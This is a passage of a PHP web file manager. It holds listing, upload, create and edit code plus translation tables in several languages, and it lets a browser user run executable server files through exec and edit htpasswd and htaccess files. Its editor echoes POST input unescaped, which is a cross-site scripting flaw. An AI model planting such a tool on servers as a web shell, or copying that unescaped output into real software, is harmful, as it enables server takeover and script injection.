            }
        }
        echo '	<td class="functions">
		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';
        $actions = array();
        if (function_exists('symlink')) {
            $actions[] = 'create_symlink';
        }
        if (@is_writable(dirname($file['path']))) {
            $actions[] = 'delete';
            $actions[] = 'rename';
            $actions[] = 'move';
        }
        if ($file['is_file'] && $file['is_readable']) {
            $actions[] = 'copy';
            $actions[] = 'download';
            if ($file['is_writable']) {
                $actions[] = 'edit';
            }
        }
        if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
            $actions[] = 'execute';
        }
        if (sizeof($actions) > 0) {
            echo '		<select class="small" name="action' . $i . '" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';
            foreach ($actions as $action) {
                echo "\t\t<option value=\"{$action}\">" . word($action) . "</option>\n";
            }
            echo '		</select>
		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
';
        }
        echo "\t</td>\r\n</tr>\r\n";
    }
    echo '<tr class="listing_footer">
	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
	<td colspan="' . ($cols - 1) . '">
		<input type="hidden" name="num" value="' . sizeof($list) . '" />
		<input type="hidden" name="focus" value="" />
		<input type="hidden" name="olddir" value="' . html($directory) . '" />
';
    $actions = array();
    if (@is_writable(dirname($file['path']))) {
        $actions[] = 'delete';
        $actions[] = 'move';
    }
    $actions[] = 'copy';
    echo '		<select class="small" name="action_all" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';
    foreach ($actions as $action) {
        echo "\t\t<option value=\"{$action}\">" . word($action) . "</option>\n";
    }
    echo "\t\t</select>\r\n\t\t<input class=\"small\" type=\"submit\" name=\"submit_all\" value=\" &gt; \" onfocus=\"activate('other')\" />\r\n\t</td>\r\n</tr>\r\n";
}
function column_title($column, $sort, $reverse)
{
    global $self, $directory;
    $d = 'dir=' . urlencode($directory) . '&amp;';
    $arr = '';
    if ($sort == $column) {
        if (!$reverse) {
            $r = '&amp;reverse=true';
            $arr = ' &and;';
        } else {
            $arr = ' &or;';
        }
    } else {
        $r = '';
    }
    echo "\t<th class=\"{$column}\"><a href=\"{$self}?{$d}sort={$column}{$r}\">" . word($column) . "</a>{$arr}</th>\n";
}
function directory_choice()
{
    global $directory, $homedir, $cols, $self;
    echo '<tr>
	<td colspan="' . $cols . '" id="directory">
		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
	</td>
</tr>
';
}
function upload_box()
{
    global $cols;
    echo '<tr>
	<td colspan="' . $cols . '" id="upload">
		' . word('file') . ':
		<input type="file" name="upload" onfocus="activate(\'other\')" />
		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
	</td>
</tr>
';
}
function create_box()
{
    global $cols;
    echo '<tr>
	<td colspan="' . $cols . '" id="create">
		<select name="create_type" size="1" onfocus="activate(\'create\')">
		<option value="file">' . word('file') . '</option>
		<option value="directory">' . word('directory') . '</option>
		</select>
		<input type="text" name="create_name" onfocus="activate(\'create\')" />
		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
	</td>
</tr>
';
}
function edit($file)
{
    global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
    html_header();
    echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>

<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
    if (array_key_exists('content', $_POST)) {
        echo $_POST['content'];
    } else {
        $f = fopen($file, 'r');
        while (!feof($f)) {
            echo html(fread($f, 8192));
        }
        fclose($f);
    }
    if (!empty($_POST['user'])) {
        echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
    }
    if (!empty($_POST['basic_auth'])) {
        if ($win) {
            $authfile = str_replace('\\', '/', $directory) . $htpasswd;
        } else {
            $authfile = $directory . $htpasswd;
        }
        echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
        echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
        echo "Require valid-user";
    }
    echo "</textarea>\r\n\r\n\t<hr />\r\n";
    if ($apache && basename($file) == $htpasswd) {
        echo '
	' . word('user') . ': <input type="text" name="user" />
	' . word('password') . ': <input type="password" name="password" />
	<input type="submit" value="' . word('add') . '" />

	<hr />
';
    }
    if ($apache && basename($file) == $htaccess) {
        echo '
	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />

	<hr />
';
    }
    echo '
	<input type="hidden" name="action" value="edit" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<input type="reset" value="' . word('reset') . '" id="red_button" />
	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
    html_footer();
}
function spacer()
{
    global $cols;
    echo '<tr>
	<td colspan="' . $cols . '" style="height: 1em"></td>
</tr>
';
}
function textfieldsize($content)
{
    $size = strlen($content) + 5;
    if ($size < 30) {
        $size = 30;
    }
    return $size;
}
function request_dump()
{
    foreach ($_REQUEST as $key => $value) {
        echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
    }
}
/* ------------------------------------------------------------------------- */
function html($string)
{
    global $site_charset;
    return htmlentities($string, ENT_COMPAT, $site_charset);
}
function word($word)
{
    global $words, $word_charset;
    return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}
function phrase($phrase, $arguments)
{
    global $words;
    static $search;
    if (!is_array($search)) {
        for ($i = 1; $i <= 8; $i++) {
            $search[] = "%{$i}";
        }
    }
    for ($i = 0; $i < sizeof($arguments); $i++) {
        $arguments[$i] = nl2br(html($arguments[$i]));
    }
    $replace = array('{' => '<pre>', '}' => '</pre>', '[' => '<b>', ']' => '</b>');
    return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
}
function getwords($lang)
{
    global $date_format, $word_charset;
    $word_charset = 'UTF-8';
    switch ($lang) {
        case 'de':
            $date_format = 'd.m.y H:i:s';
            return array("directory" => "Verzeichnis", "file" => "Datei", "filename" => "Dateiname", "size" => "Gr\xc3\xb6\xc3\x9fe", "permission" => "Rechte", "owner" => "Eigner", "group" => "Gruppe", "other" => "Andere", "functions" => "Funktionen", "read" => "lesen", "write" => "schreiben", "execute" => "ausf\xc3\xbchren", "create_symlink" => "Symlink erstellen", "delete" => "l\xc3\xb6schen", "rename" => "umbenennen", "move" => "verschieben", "copy" => "kopieren", "edit" => "editieren", "download" => "herunterladen", "upload" => "hochladen", "create" => "erstellen", "change" => "wechseln", "save" => "speichern", "set" => "setze", "reset" => "zur\xc3\xbccksetzen", "relative" => "Pfad zum Ziel relativ", "yes" => "Ja", "no" => "Nein", "back" => "zur\xc3\xbcck", "destination" => "Ziel", "symlink" => "Symbolischer Link", "no_output" => "keine Ausgabe", "user" => "Benutzername", "password" => "Kennwort", "add" => "hinzuf\xc3\xbcgen", "add_basic_auth" => "HTTP-Basic-Auth hinzuf\xc3\xbcgen", "uploaded" => "\"[%1]\" wurde hochgeladen.", "not_uploaded" => "\"[%1]\" konnte nicht hochgeladen werden.", "already_exists" => "\"[%1]\" existiert bereits.", "created" => "\"[%1]\" wurde erstellt.", "not_created" => "\"[%1]\" konnte nicht erstellt werden.", "really_delete" => "Sollen folgende Dateien wirklich gel\xc3\xb6scht werden?", "deleted" => "Folgende Dateien wurden gel\xc3\xb6scht:\n[%1]", "not_deleted" => "Folgende Dateien konnten nicht gel\xc3\xb6scht werden:\n[%1]", "rename_file" => "Benenne Datei um:", "renamed" => "\"[%1]\" wurde in \"[%2]\" umbenannt.", "not_renamed" => "\"[%1] konnte nicht in \"[%2]\" umbenannt werden.", "move_files" => "Verschieben folgende Dateien:", "moved" => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]", "not_moved" => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]", "copy_files" => "Kopiere folgende Dateien:", "copied" => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", "not_copied" => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", "not_edited" => "\"[%1]\" kann nicht editiert werden.", "executed" => "\"[%1]\" wurde erfolgreich ausgef\xc3\xbchrt:\n{%2}", "not_executed" => "\"[%1]\" konnte nicht erfolgreich ausgef\xc3\xbchrt werden:\n{%2}", "saved" => "\"[%1]\" wurde gespeichert.", "not_saved" => "\"[%1]\" konnte nicht gespeichert werden.", "symlinked" => "Symbolischer Link von \"[%2]\" nach \"[%1]\" wurde erstellt.", "not_symlinked" => "Symbolischer Link von \"[%2]\" nach \"[%1]\" konnte nicht erstellt werden.", "permission_for" => "Rechte f\xc3\xbcr \"[%1]\":", "permission_set" => "Die Rechte f\xc3\xbcr \"[%1]\" wurden auf [%2] gesetzt.", "permission_not_set" => "Die Rechte f\xc3\xbcr \"[%1]\" konnten nicht auf [%2] gesetzt werden.", "not_readable" => "\"[%1]\" kann nicht gelesen werden.");
        case 'fr':
            $date_format = 'd.m.y H:i:s';
            return array("directory" => "R\xc3\xa9pertoire", "file" => "Fichier", "filename" => "Nom fichier", "size" => "Taille", "permission" => "Droits", "owner" => "Propri\xc3\xa9taire", "group" => "Groupe", "other" => "Autres", "functions" => "Fonctions", "read" => "Lire", "write" => "Ecrire", "execute" => "Ex\xc3\xa9cuter", "create_symlink" => "Cr\xc3\xa9er lien symbolique", "delete" => "Effacer", "rename" => "Renommer", "move" => "D\xc3\xa9placer", "copy" => "Copier", "edit" => "Ouvrir", "download" => "T\xc3\xa9l\xc3\xa9charger sur PC", "upload" => "T\xc3\xa9l\xc3\xa9charger sur serveur", "create" => "Cr\xc3\xa9er", "change" => "Changer", "save" => "Sauvegarder", "set" => "Ex\xc3\xa9cuter", "reset" => "R\xc3\xa9initialiser", "relative" => "Relatif", "yes" => "Oui", "no" => "Non", "back" => "Retour", "destination" => "Destination", "symlink" => "Lien symbollique", "no_output" => "Pas de sortie", "user" => "Utilisateur", "password" => "Mot de passe", "add" => "Ajouter", "add_basic_auth" => "add basic-authentification", "uploaded" => "\"[%1]\" a \xc3\xa9t\xc3\xa9 t\xc3\xa9l\xc3\xa9charg\xc3\xa9 sur le serveur.", "not_uploaded" => "\"[%1]\" n a pas \xc3\xa9t\xc3\xa9 t\xc3\xa9l\xc3\xa9charg\xc3\xa9 sur le serveur.", "already_exists" => "\"[%1]\" existe d\xc3\xa9j\xc3\xa0.", "created" => "\"[%1]\" a \xc3\xa9t\xc3\xa9 cr\xc3\xa9\xc3\xa9.", "not_created" => "\"[%1]\" n a pas pu \xc3\xaatre cr\xc3\xa9\xc3\xa9.", "really_delete" => "Effacer le fichier?", "deleted" => "Ces fichiers ont \xc3\xa9t\xc3\xa9 d\xc3\xa9tuits:\n[%1]", "not_deleted" => "Ces fichiers n ont pu \xc3\xaatre d\xc3\xa9truits:\n[%1]", "rename_file" => "Renomme fichier:", "renamed" => "\"[%1]\" a \xc3\xa9t\xc3\xa9 renomm\xc3\xa9 en \"[%2]\".", "not_renamed" => "\"[%1] n a pas pu \xc3\xaatre renomm\xc3\xa9 en \"[%2]\".", "move_files" => "D\xc3\xa9placer ces fichiers:", "moved" => "Ces fichiers ont \xc3\xa9t\xc3\xa9 d\xc3\xa9plac\xc3\xa9s en \"[%2]\":\n[%1]", "not_moved" => "Ces fichiers n ont pas pu \xc3\xaatre d\xc3\xa9plac\xc3\xa9s en \"[%2]\":\n[%1]", "copy_files" => "Copier ces fichiers:", "copied" => "Ces fichiers ont \xc3\xa9t\xc3\xa9 copi\xc3\xa9s en \"[%2]\":\n[%1]", "not_copied" => "Ces fichiers n ont pas pu \xc3\xaatre copi\xc3\xa9s en \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" ne peut \xc3\xaatre ouvert.", "executed" => "\"[%1]\" a \xc3\xa9t\xc3\xa9 brillamment ex\xc3\xa9cut\xc3\xa9 :\n{%2}", "not_executed" => "\"[%1]\" n a pas pu \xc3\xaatre ex\xc3\xa9cut\xc3\xa9:\n{%2}", "saved" => "\"[%1]\" a \xc3\xa9t\xc3\xa9 sauvegard\xc3\xa9.", "not_saved" => "\"[%1]\" n a pas pu \xc3\xaatre sauvegard\xc3\xa9.", "symlinked" => "Un lien symbolique depuis \"[%2]\" vers \"[%1]\" a \xc3\xa9t\xc3\xa9 cr\xc3\xa9e.", "not_symlinked" => "Un lien symbolique depuis \"[%2]\" vers \"[%1]\" n a pas pu \xc3\xaatre cr\xc3\xa9\xc3\xa9.", "permission_for" => "Droits de \"[%1]\":", "permission_set" => "Droits de \"[%1]\" ont \xc3\xa9t\xc3\xa9 chang\xc3\xa9s en [%2].", "permission_not_set" => "Droits de \"[%1]\" n ont pas pu \xc3\xaatre chang\xc3\xa9s en[%2].", "not_readable" => "\"[%1]\" ne peut pas \xc3\xaatre ouvert.");
        case 'it':
            $date_format = 'd-m-Y H:i:s';
            return array("directory" => "Directory", "file" => "File", "filename" => "Nome File", "size" => "Dimensioni", "permission" => "Permessi", "owner" => "Proprietario", "group" => "Gruppo", "other" => "Altro", "functions" => "Funzioni", "read" => "leggi", "write" => "scrivi", "execute" => "esegui", "create_symlink" => "crea link simbolico", "delete" => "cancella", "rename" => "rinomina", "move" => "sposta", "copy" => "copia", "edit" => "modifica", "download" => "download", "upload" => "upload", "create" => "crea", "change" => "cambia", "save" => "salva", "set" => "imposta", "reset" => "reimposta", "relative" => "Percorso relativo per la destinazione", "yes" => "Si", "no" => "No", "back" => "indietro", "destination" => "Destinazione", "symlink" => "Link simbolico", "no_output" => "no output", "user" => "User", "password" => "Password", "add" => "aggiungi", "add_basic_auth" => "aggiungi autenticazione base", "uploaded" => "\"[%1]\" \xc3\xa8 stato caricato.", "not_uploaded" => "\"[%1]\" non \xc3\xa8 stato caricato.", "already_exists" => "\"[%1]\" esiste gi\xc3\xa0.", "created" => "\"[%1]\" \xc3\xa8 stato creato.", "not_created" => "\"[%1]\" non \xc3\xa8 stato creato.", "really_delete" => "Cancello questi file ?", "deleted" => "Questi file sono stati cancellati:\n[%1]", "not_deleted" => "Questi file non possono essere cancellati:\n[%1]", "rename_file" => "File rinominato:", "renamed" => "\"[%1]\" \xc3\xa8 stato rinominato in \"[%2]\".", "not_renamed" => "\"[%1] non \xc3\xa8 stato rinominato in \"[%2]\".", "move_files" => "Sposto questi file:", "moved" => "Questi file sono stati spostati in \"[%2]\":\n[%1]", "not_moved" => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", "copy_files" => "Copio questi file", "copied" => "Questi file sono stati copiati in \"[%2]\":\n[%1]", "not_copied" => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" non pu\xc3\xb2 essere modificato.", "executed" => "\"[%1]\" \xc3\xa8 stato eseguito con successo:\n{%2}", "not_executed" => "\"[%1]\" non \xc3\xa8 stato eseguito con successo\n{%2}", "saved" => "\"[%1]\" \xc3\xa8 stato salvato.", "not_saved" => "\"[%1]\" non \xc3\xa8 stato salvato.", "symlinked" => "Il link siambolico da \"[%2]\" a \"[%1]\" \xc3\xa8 stato creato.", "not_symlinked" => "Il link siambolico da \"[%2]\" a \"[%1]\" non \xc3\xa8 stato creato.", "permission_for" => "Permessi di \"[%1]\":", "permission_set" => "I permessi di \"[%1]\" sono stati impostati [%2].", "permission_not_set" => "I permessi di \"[%1]\" non sono stati impostati [%2].", "not_readable" => "\"[%1]\" non pu\xc3\xb2 essere letto.");
        case 'nl':
            $date_format = 'n/j/y H:i:s';
            return array("directory" => "Directory", "file" => "Bestand", "filename" => "Bestandsnaam", "size" => "Grootte", "permission" => "Bevoegdheid", "owner" => "Eigenaar", "group" => "Groep", "other" => "Anderen", "functions" => "Functies", "read" => "lezen", "write" => "schrijven", "execute" => "uitvoeren", "create_symlink" => "maak symlink", "delete" => "verwijderen", "rename" => "hernoemen", "move" => "verplaatsen", "copy" => "kopieren", "edit" => "bewerken", "download" => "downloaden", "upload" => "uploaden", "create" => "aanmaken", "change" => "veranderen", "save" => "opslaan", "set" => "instellen", "reset" => "resetten", "relative" => "Relatief pat naar doel", "yes" => "Ja", "no" => "Nee", "back" => "terug", "destination" => "Bestemming", "symlink" => "Symlink", "no_output" => "geen output", "user" => "Gebruiker", "password" => "Wachtwoord", "add" => "toevoegen", "add_basic_auth" => "add basic-authentification", "uploaded" => "\"[%1]\" is verstuurd.", "not_uploaded" => "\"[%1]\" kan niet worden verstuurd.", "already_exists" => "\"[%1]\" bestaat al.", "created" => "\"[%1]\" is aangemaakt.", "not_created" => "\"[%1]\" kan niet worden aangemaakt.", "really_delete" => "Deze bestanden verwijderen?", "deleted" => "Deze bestanden zijn verwijderd:\n[%1]", "not_deleted" => "Deze bestanden konden niet worden verwijderd:\n[%1]", "rename_file" => "Bestandsnaam veranderen:", "renamed" => "\"[%1]\" heet nu \"[%2]\".", "not_renamed" => "\"[%1] kon niet worden veranderd in \"[%2]\".", "move_files" => "Verplaats deze bestanden:", "moved" => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]", "not_moved" => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]", "copy_files" => "Kopieer deze bestanden:", "copied" => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]", "not_copied" => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" kan niet worden bewerkt.", "executed" => "\"[%1]\" is met succes uitgevoerd:\n{%2}", "not_executed" => "\"[%1]\" is niet goed uitgevoerd:\n{%2}", "saved" => "\"[%1]\" is opgeslagen.", "not_saved" => "\"[%1]\" is niet opgeslagen.", "symlinked" => "Symlink van \"[%2]\" naar \"[%1]\" is aangemaakt.", "not_symlinked" => "Symlink van \"[%2]\" naar \"[%1]\" is niet aangemaakt.", "permission_for" => "Bevoegdheid voor \"[%1]\":", "permission_set" => "Bevoegdheid van \"[%1]\" is ingesteld op [%2].", "permission_not_set" => "Bevoegdheid van \"[%1]\" is niet ingesteld op [%2].", "not_readable" => "\"[%1]\" kan niet worden gelezen.");
        case 'se':
            $date_format = 'n/j/y H:i:s';
            return array("directory" => "Mapp", "file" => "Fil", "filename" => "Filnamn", "size" => "Storlek", "permission" => "S\xc3\xa4kerhetsniv\xc3\xa5", "owner" => "\xc3\x84gare", "group" => "Grupp", "other" => "Andra", "functions" => "Funktioner", "read" => "L\xc3\xa4s", "write" => "Skriv", "execute" => "Utf\xc3\xb6r", "create_symlink" => "Skapa symlink", "delete" => "Radera", "rename" => "Byt namn", "move" => "Flytta", "copy" => "Kopiera", "edit" => "\xc3\x84ndra", "download" => "Ladda ner", "upload" => "Ladda upp", "create" => "Skapa", "change" => "\xc3\x84ndra", "save" => "Spara", "set" => "Markera", "reset" => "T\xc3\xb6m", "relative" => "Relative path to target", "yes" => "Ja", "no" => "Nej", "back" => "Tillbaks", "destination" => "Destination", "symlink" => "Symlink", "no_output" => "no output", "user" => "Anv\xc3\xa4ndare", "password" => "L\xc3\xb6senord", "add" => "L\xc3\xa4gg till", "add_basic_auth" => "add basic-authentification", "uploaded" => "\"[%1]\" har laddats upp.", "not_uploaded" => "\"[%1]\" kunde inte laddas upp.", "already_exists" => "\"[%1]\" finns redan.", "created" => "\"[%1]\" har skapats.", "not_created" => "\"[%1]\" kunde inte skapas.", "really_delete" => "Radera dessa filer?", "deleted" => "De h\xc3\xa4r filerna har raderats:\n[%1]", "not_deleted" => "Dessa filer kunde inte raderas:\n[%1]", "rename_file" => "Byt namn p\xc3\xa5 fil:", "renamed" => "\"[%1]\" har bytt namn till \"[%2]\".", "not_renamed" => "\"[%1] kunde inte d\xc3\xb6pas om till \"[%2]\".", "move_files" => "Flytta dessa filer:", "moved" => "Dessa filer har flyttats till \"[%2]\":\n[%1]", "not_moved" => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", "copy_files" => "Kopiera dessa filer:", "copied" => "Dessa filer har kopierats till \"[%2]\":\n[%1]", "not_copied" => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" kan inte \xc3\xa4ndras.", "executed" => "\"[%1]\" har utf\xc3\xb6rts:\n{%2}", "not_executed" => "\"[%1]\" kunde inte utf\xc3\xb6ras:\n{%2}", "saved" => "\"[%1]\" har sparats.", "not_saved" => "\"[%1]\" kunde inte sparas.", "symlinked" => "Symlink fr\xc3\xa5n \"[%2]\" till \"[%1]\" har skapats.", "not_symlinked" => "Symlink fr\xc3\xa5n \"[%2]\" till \"[%1]\" kunde inte skapas.", "permission_for" => "R\xc3\xa4ttigheter f\xc3\xb6r \"[%1]\":", "permission_set" => "R\xc3\xa4ttigheter f\xc3\xb6r \"[%1]\" \xc3\xa4ndrades till [%2].", "permission_not_set" => "Permission of \"[%1]\" could not be set to [%2].", "not_readable" => "\"[%1]\" kan inte l\xc3\xa4sas.");
        case 'sp':
            $date_format = 'j/n/y H:i:s';
            return array("directory" => "Directorio", "file" => "Archivo", "filename" => "Nombre Archivo", "size" => "Tama\xc3\xb1o", "permission" => "Permisos", "owner" => "Propietario", "group" => "Grupo", "other" => "Otros", "functions" => "Funciones", "read" => "lectura", "write" => "escritura", "execute" => "ejecuci\xc3\xb3n", "create_symlink" => "crear enlace", "delete" => "borrar", "rename" => "renombrar", "move" => "mover", "copy" => "copiar", "edit" => "editar", "download" => "bajar", "upload" => "subir", "create" => "crear", "change" => "cambiar", "save" => "salvar", "set" => "setear", "reset" => "resetear", "relative" => "Path relativo", "yes" => "Si", "no" => "No", "back" => "atr\xc3\xa1s", "destination" => "Destino", "symlink" => "Enlace", "no_output" => "sin salida", "user" => "Usuario", "password" => "Clave", "add" => "agregar", "add_basic_auth" => "agregar autentificaci\xc3\xb3n b\xc3\xa1sica", "uploaded" => "\"[%1]\" ha sido subido.", "not_uploaded" => "\"[%1]\" no pudo ser subido.", "already_exists" => "\"[%1]\" ya existe.", "created" => "\"[%1]\" ha sido creado.", "not_created" => "\"[%1]\" no pudo ser creado.", "really_delete" => "\xc2\xbfBorra estos archivos?", "deleted" => "Estos archivos han sido borrados:\n[%1]", "not_deleted" => "Estos archivos no pudieron ser borrados:\n[%1]", "rename_file" => "Renombra archivo:", "renamed" => "\"[%1]\" ha sido renombrado a \"[%2]\".", "not_renamed" => "\"[%1] no pudo ser renombrado a \"[%2]\".", "move_files" => "Mover estos archivos:", "moved" => "Estos archivos han sido movidos a \"[%2]\":\n[%1]", "not_moved" => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]", "copy_files" => "Copiar estos archivos:", "copied" => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]", "not_copied" => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" no pudo ser editado.", "executed" => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}", "not_executed" => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}", "saved" => "\"[%1]\" ha sido salvado.", "not_saved" => "\"[%1]\" no pudo ser salvado.", "symlinked" => "Enlace desde \"[%2]\" a \"[%1]\" ha sido creado.", "not_symlinked" => "Enlace desde \"[%2]\" a \"[%1]\" no pudo ser creado.", "permission_for" => "Permisos de \"[%1]\":", "permission_set" => "Permisos de \"[%1]\" fueron seteados a [%2].", "permission_not_set" => "Permisos de \"[%1]\" no pudo ser seteado a [%2].", "not_readable" => "\"[%1]\" no pudo ser le\xc3\xaddo.");
        case 'dk':
            $date_format = 'n/j/y H:i:s';
            return array("directory" => "Mappe", "file" => "Fil", "filename" => "Filnavn", "size" => "St\xc3\xb8rrelse", "permission" => "Rettighed", "owner" => "Ejer", "group" => "Gruppe", "other" => "Andre", "functions" => "Funktioner", "read" => "l\xc3\xa6s", "write" => "skriv", "execute" => "k\xc3\xb8r", "create_symlink" => "opret symbolsk link", "delete" => "slet", "rename" => "omd\xc3\xb8b", "move" => "flyt", "copy" => "kopier", "edit" => "rediger", "download" => "download", "upload" => "upload", "create" => "opret", "change" => "skift", "save" => "gem", "set" => "s\xc3\xa6t", "reset" => "nulstil", "relative" => "Relativ sti til valg", "yes" => "Ja", "no" => "Nej", "back" => "tilbage", "destination" => "Distination", "symlink" => "Symbolsk link", "no_output" => "ingen resultat", "user" => "Bruger", "password" => "Kodeord", "add" => "tilf\xc3\xb8j", "add_basic_auth" => "tilf\xc3\xb8j grundliggende rettigheder", "uploaded" => "\"[%1]\" er blevet uploaded.", "not_uploaded" => "\"[%1]\" kunnu ikke uploades.", "already_exists" => "\"[%1]\" findes allerede.", "created" => "\"[%1]\" er blevet oprettet.", "not_created" => "\"[%1]\" kunne ikke oprettes.", "really_delete" => "Slet disse filer?", "deleted" => "Disse filer er blevet slettet:\n[%1]", "not_deleted" => "Disse filer kunne ikke slettes:\n[%1]", "rename_file" => "Omd\xc3\xb8d fil:", "renamed" => "\"[%1]\" er blevet omd\xc3\xb8bt til \"[%2]\".", "not_renamed" => "\"[%1] kunne ikke omd\xc3\xb8bes til \"[%2]\".", "move_files" => "Flyt disse filer:", "moved" => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]", "not_moved" => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]", "copy_files" => "Kopier disse filer:", "copied" => "Disse filer er kopieret til \"[%2]\":\n[%1]", "not_copied" => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" kan ikke redigeres.", "executed" => "\"[%1]\" er blevet k\xc3\xb8rt korrekt:\n{%2}", "not_executed" => "\"[%1]\" kan ikke k\xc3\xb8res korrekt:\n{%2}", "saved" => "\"[%1]\" er blevet gemt.", "not_saved" => "\"[%1]\" kunne ikke gemmes.", "symlinked" => "Symbolsk link fra \"[%2]\" til \"[%1]\" er blevet oprettet.", "not_symlinked" => "Symbolsk link fra \"[%2]\" til \"[%1]\" kunne ikke oprettes.", "permission_for" => "Rettigheder for \"[%1]\":", "permission_set" => "Rettigheder for \"[%1]\" blev sat til [%2].", "permission_not_set" => "Rettigheder for \"[%1]\" kunne ikke s\xc3\xa6ttes til [%2].", "not_readable" => "\"[%1]\" Kan ikke l\xc3\xa6ses.");
        case 'tr':
            $date_format = 'n/j/y H:i:s';
            return array("directory" => "Klas\xc3\xb6r", "file" => "Dosya", "filename" => "dosya adi", "size" => "boyutu", "permission" => "Izin", "owner" => "sahib", "group" => "Grup", "other" => "Digerleri", "functions" => "Fonksiyonlar", "read" => "oku", "write" => "yaz", "execute" => "\xc3\xa7alistir", "create_symlink" => "yarat symlink", "delete" => "sil", "rename" => "ad degistir", "move" => "tasi", "copy" => "kopyala", "edit" => "d\xc3\xbczenle", "download" => "indir", "upload" => "y\xc3\xbckle", "create" => "create", "change" => "degistir", "save" => "kaydet", "set" => "ayar", "reset" => "sifirla", "relative" => "Hedef yola g\xc3\xb6re", "yes" => "Evet", "no" => "Hayir", "back" => "Geri", "destination" => "Hedef", "symlink" => "K\xc3\xbdsa yol", "no_output" => "\xc3\xa7ikti yok", "user" => "Kullanici", "password" => "Sifre", "add" => "ekle", "add_basic_auth" => "ekle basit-authentification", "uploaded" => "\"[%1]\" y\xc3\xbcklendi.", "not_uploaded" => "\"[%1]\" y\xc3\xbcklenemedi.", "already_exists" => "\"[%1]\" kullanilmakta.", "created" => "\"[%1]\" olusturuldu.", "not_created" => "\"[%1]\" olusturulamadi.", "really_delete" => "Bu dosyalari silmek istediginizden eminmisiniz?", "deleted" => "Bu dosyalar silindi:\n[%1]", "not_deleted" => "Bu dosyalar silinemedi:\n[%1]", "rename_file" => "Adi degisen dosya:", "renamed" => "\"[%1]\" adili dosyanin yeni adi \"[%2]\".", "not_renamed" => "\"[%1] adi degistirilemedi \"[%2]\" ile.", "move_files" => "Tasinan dosyalar:", "moved" => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]", "not_moved" => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]", "copy_files" => "Kopyalanan dosyalar:", "copied" => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]", "not_copied" => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]", "not_edited" => "\"[%1]\" d\xc3\xbczenlenemiyor.", "executed" => "\"[%1]\" basariyla \xc3\xa7alistirildi:\n{%2}", "not_executed" => "\"[%1]\" \xc3\xa7alistirilamadi:\n{%2}", "saved" => "\"[%1]\" kaydedildi.", "not_saved" => "\"[%1]\" kaydedilemedi.", "symlinked" => "\"[%2]\" den \"[%1]\" e k\xc3\xbdsayol olu\xc3\xbeturuldu.", "not_symlinked" => "\"[%2]\"den \"[%1]\" e k\xc3\xbdsayol olu\xc3\xbeturulamad\xc3\xbd.", "permission_for" => "Izinler \"[%1]\":", "permission_set" => "Izinler \"[%1]\" degistirildi [%2].", "permission_not_set" => "Izinler \"[%1]\" degistirilemedi [%2].", "not_readable" => "\"[%1]\" okunamiyor.");
        case 'cs':
            $date_format = 'd.m.y H:i:s';
